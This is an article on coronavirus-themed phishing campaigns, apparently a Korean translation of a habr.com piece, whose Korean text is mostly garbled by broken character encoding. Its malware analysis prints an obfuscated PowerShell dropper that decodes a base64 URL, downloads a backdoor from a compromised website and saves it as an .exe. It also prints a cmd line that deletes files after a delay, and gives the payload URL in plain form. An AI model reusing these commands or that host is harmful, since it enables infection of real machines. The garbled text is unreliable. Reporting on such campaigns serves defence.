๊ณต๊ฒฉ์๋ค์ ๊ณ์ํด์ ์ฝ๋ก๋19 ์ฃผ์ ๋ฅผ ์
์ฉํ์ฌ ์ ์ผ๋ณ๊ณผ ๊ด๋ จ๋ ๋ชจ๋ ๊ฒ์ ๊น์ ๊ด์ฌ์ ๊ฐ๊ณ ์๋ ์ฌ์ฉ์์๊ฒ ์ ์ ๋ ๋ง์ ์ํ์ ๊ฐํ๊ณ ์์ต๋๋ค. ์์
๊ธฐ์ตํ๋ค
์ฝ๋ก๋19 ๋ฌด๋ฃ ๊ฒ์ฌ๋ฅผ ์ํ์๋์?
์ฝ๋ก๋๋ฐ์ด๋ฌ์ค๋ฅผ ์ฃผ์ ๋ก ํ ํผ์ฑ์ ๋ ๋ค๋ฅธ ์ค์ํ ์๋ ๋ค์๊ณผ ๊ฐ์ต๋๋ค.
๋๋ถ๋ถ์ ์ฌ์ฉ์๊ฐ ๋งคํฌ๋ก๋ฅผ ํ์ฑํํ๋๋ก ์ค๋ํ๋ ๊ฒ๋ ์ฌ์ ์ต๋๋ค. ์ด๋ฅผ ์ํด ํ์ค ํธ๋ฆญ์ด ์ฌ์ฉ๋์์ต๋๋ค. ์ค๋ฌธ์ง๋ฅผ ์์ฑํ๋ ค๋ฉด ๋จผ์ ๋งคํฌ๋ก๋ฅผ ํ์ฑํํด์ผ ํฉ๋๋ค. ์ฆ, VBA ์คํฌ๋ฆฝํธ๋ฅผ ์คํํด์ผ ํฉ๋๋ค.
๋ณด์๋ค์ํผ VBA ์คํฌ๋ฆฝํธ๋ ๋ฐ์ด๋ฌ์ค ๋ฐฑ์ ์์ ํน๋ณํ ๊ฐ๋ ค์ ธ ์์ต๋๋ค.
Windows์๋ ์์ฉ ํ๋ก๊ทธ๋จ์ด ๊ธฐ๋ณธ "์" ์๋ต์ ์๋ฝํ๊ธฐ ์ ์ /T <์ด>๋ฅผ ๊ธฐ๋ค๋ฆฌ๋ ๋๊ธฐ ๊ธฐ๋ฅ์ด ์์ต๋๋ค. ์ฐ๋ฆฌ์ ๊ฒฝ์ฐ ์คํฌ๋ฆฝํธ๋ ์์ ํ์ผ์ ์ญ์ ํ๊ธฐ ์ ์ 65์ด๋ฅผ ๊ธฐ๋ค๋ ธ์ต๋๋ค.
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
๊ทธ๋ฆฌ๊ณ ๊ธฐ๋ค๋ฆฌ๋ ๋์ ์
์ฑ์ฝ๋๊ฐ ๋ค์ด๋ก๋๋์์ต๋๋ค. ์ด๋ฅผ ์ํด ํน๋ณํ PowerShell ์คํฌ๋ฆฝํธ๊ฐ ์์๋์์ต๋๋ค.
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Base64 ๊ฐ์ ๋์ฝ๋ฉํ ํ PowerShell ์คํฌ๋ฆฝํธ๋ ์ด์ ์ ํดํน๋ ๋ ์ผ ์น ์๋ฒ์ ์๋ ๋ฐฑ๋์ด๋ฅผ ๋ค์ด๋ก๋ํฉ๋๋ค.
http://automatischer-staubsauger.com/feature/777777.png
๋ค์ ์ด๋ฆ์ผ๋ก ์ ์ฅํฉ๋๋ค.
C:UsersPublictmpdirfile1.exe
ํด๋ โC:UsersPublictmpdirโ
ํด๋น ๋ช
๋ น์ด ํฌํจ๋ 'tmps1.bat' ํ์ผ์ ์คํํ๋ฉด ์ญ์ ๋ฉ๋๋ค. cmd /c mkdir ""C:UsersPublictmpdir"".
์ ๋ถ ๊ธฐ๊ด์ ๋์์ผ๋ก ํ ํ์ ๊ณต๊ฒฉ
๋ํ, FireEye ๋ถ์๊ฐ๋ค์ ์ต๊ทผ ์ฐํ์ ์ ๋ถ ๊ธฐ๊ด๊ณผ ์ค๊ตญ ๋น์๊ด๋ฆฌ๋ถ๋ฅผ ํ์ ์ผ๋ก ์ผ์ APT32 ๊ณต๊ฒฉ์ด ๋ณด๊ณ ๋์์ต๋๋ค. ๋ฐฐํฌ๋ RTF ์ค ํ๋์๋ New York Times ๊ธฐ์ฌ์ ๋ํ ๋งํฌ๊ฐ ํฌํจ๋์ด ์์ต๋๋ค.
ํฅ๋ฏธ๋กญ๊ฒ๋ Virustotal์ ๋ฐ๋ฅด๋ฉด ํ์ง ๋น์ ๋ฐ์ด๋ฌ์ค ๋ฐฑ์ ์ค ์ด๋ ๊ฒ๋ ์ด ์ธ์คํด์ค๋ฅผ ํ์งํ์ง ๋ชปํ์ต๋๋ค.
๊ณต์ ์น์ฌ์ดํธ๊ฐ ๋ค์ด๋ ๊ฒฝ์ฐ
ํผ์ฑ ๊ณต๊ฒฉ์ ๊ฐ์ฅ ๋์ ๋๋ ์ฌ๋ก๋ ๋ฐ๋ก ์ผ๋ง ์ ๋ฌ์์์์ ๋ฐ์ํ์ต๋๋ค. ๊ทธ ์ด์ ๋ 3~16์ธ ์ด๋ฆฐ์ด๋ฅผ ๋์์ผ๋ก ์ค๋ซ๋์ ๊ธฐ๋ค๋ ค์จ ํํ์ด ์ง์ ๋์๊ธฐ ๋๋ฌธ์ ๋๋ค. 12๋ 2020์ XNUMX์ผ์ ์ ์ฒญ ์ ์ ์์์ด ๋ฐํ๋์์ ๋ ์๋ฐฑ๋ง ๋ช ์ด ์ค๋ซ๋์ ๊ธฐ๋ค๋ ค์จ ๋์์ ๋ฐ๊ธฐ ์ํด ์ฃผ์ ๋ถ ์๋น์ค ์น์ฌ์ดํธ๋ก ๋ฌ๋ ค๊ฐ๊ณ ์ ๋ฌธ์ ์ธ DDoS ๊ณต๊ฒฉ๋ณด๋ค ๋์์ง ์์ ํฌํธ์ ๋ค์ด์์ผฐ์ต๋๋ค. ๋ํต๋ น์ด โ์ ๋ถ๊ฐ ์ง์์์ ํ๋ฆ์ ๊ฐ๋นํ ์ ์๋คโ๊ณ ๋งํ์ ์ฌ๋๋ค์ ์จ๋ผ์ธ์์ ์ง์์๋ฅผ ์ ์ํ ์ ์๋ ๋์ฒด ์ฌ์ดํธ ๊ฐ์ค์ ๋ํด ์ด์ผ๊ธฐํ๊ธฐ ์์ํ๋ค.
๋ฌธ์ ๋ ์ฌ๋ฌ ์ฌ์ดํธ๊ฐ ๋์์ ์๋ํ๊ธฐ ์์ํ๊ณ ์ค์ ์ฌ์ดํธ์ธ posobie16.gosuslugi.ru๋ ์ค์ ๋ก ์์ฉ ํ๋ก๊ทธ๋จ์ ํ์ฉํ๋ ๋ฐ๋ฉด ๋ ๋ง์ ์ฌ์ดํธ๊ฐ ์๋ํ๋ค๋ ๊ฒ์
๋๋ค.
SearchInform์ ๋๋ฃ๋ค์ .ru ์์ญ์์ ์ฝ 30๊ฐ์ ์๋ก์ด ์ฌ๊ธฐ์ฑ ๋๋ฉ์ธ์ ๋ฐ๊ฒฌํ์ต๋๋ค. Infosecurity์ Softline Company๋ 70์ ์ด๋ถํฐ 16๊ฐ ์ด์์ ์ ์ฌํ ๊ฐ์ง ์ ๋ถ ์๋น์ค ์น์ฌ์ดํธ๋ฅผ ์ถ์ ํ์ต๋๋ค. ์ ์์๋ ์น์ํ ๊ธฐํธ๋ฅผ ์กฐ์ํ๊ณ gosuslugi, gosuslugi-XNUMX, vyplaty, covid-vyplaty, posobie ๋ฑ์ ๋จ์ด ์กฐํฉ์ ์ฌ์ฉํฉ๋๋ค.
๊ณผ๋๊ด๊ณ ์ ์ฌํ๊ณตํ
์ด๋ฌํ ๋ชจ๋ ์๋ ๊ณต๊ฒฉ์๊ฐ ์ฝ๋ก๋๋ฐ์ด๋ฌ์ค๋ผ๋ ์ฃผ์ ๋ก ์ฑ๊ณต์ ์ผ๋ก ์์ต์ ์ฐฝ์ถํ๊ณ ์์์ ํ์ธํ ๋ฟ์ ๋๋ค. ๊ทธ๋ฆฌ๊ณ ์ฌํ์ ๊ธด์ฅ์ด ๋์์ง๊ณ ๋ฌธ์ ๊ฐ ๋ถ๋ถ๋ช ํด์ง์๋ก ์ฌ๊ธฐ๊พผ์ด ์ค์ํ ๋ฐ์ดํฐ๋ฅผ ํ์น๊ฑฐ๋ ์ฌ๋๋ค์ด ์ค์ค๋ก ๋์ ํฌ๊ธฐํ๋๋ก ๊ฐ์ํ๊ฑฐ๋ ๋จ์ํ ๋ ๋ง์ ์ปดํจํฐ๋ฅผ ํดํนํ ๊ฐ๋ฅ์ฑ์ด ๋ ์ปค์ง๋๋ค.
๊ทธ๋ฆฌ๊ณ ํฌ๋ฐ๋ฏน์ผ๋ก ์ธํด ์ค๋น๊ฐ ์ ๋ ์ฌ๋๋ค์ด ๋๊ท๋ชจ๋ก ์ฌํ๊ทผ๋ฌด๋ฅผ ํ๊ฒ ๋๋ฉด์ ๊ฐ์ธ ๋ฐ์ดํฐ๋ฟ๋ง ์๋๋ผ ๊ธฐ์
๋ฐ์ดํฐ๋ ์ํ์ ์ฒํด ์์ต๋๋ค. ์๋ฅผ ๋ค์ด ์ต๊ทผ์๋ Microsoft 365(์ด์ Office 365) ์ฌ์ฉ์๋ ํผ์ฑ ๊ณต๊ฒฉ์ ๋ฐ์์ต๋๋ค. ์ฌ๋๋ค์ ํธ์ง์ ์ฒจ๋ถ๋ ๋ด์ฉ์ผ๋ก ๋๋์ '๋ถ์ฌ์ค' ์์ฑ ๋ฉ์์ง๋ฅผ ๋ฐ์์ต๋๋ค. ๊ทธ๋ฌ๋ ํ์ผ์ ์ค์ ๋ก ๊ณต๊ฒฉ ํผํด์๋ฅผ ๋ค์์ผ๋ก ๋ณด๋ด๋ HTML ํ์ด์ง์์ต๋๋ค.
์ถ์ฒ : habr.com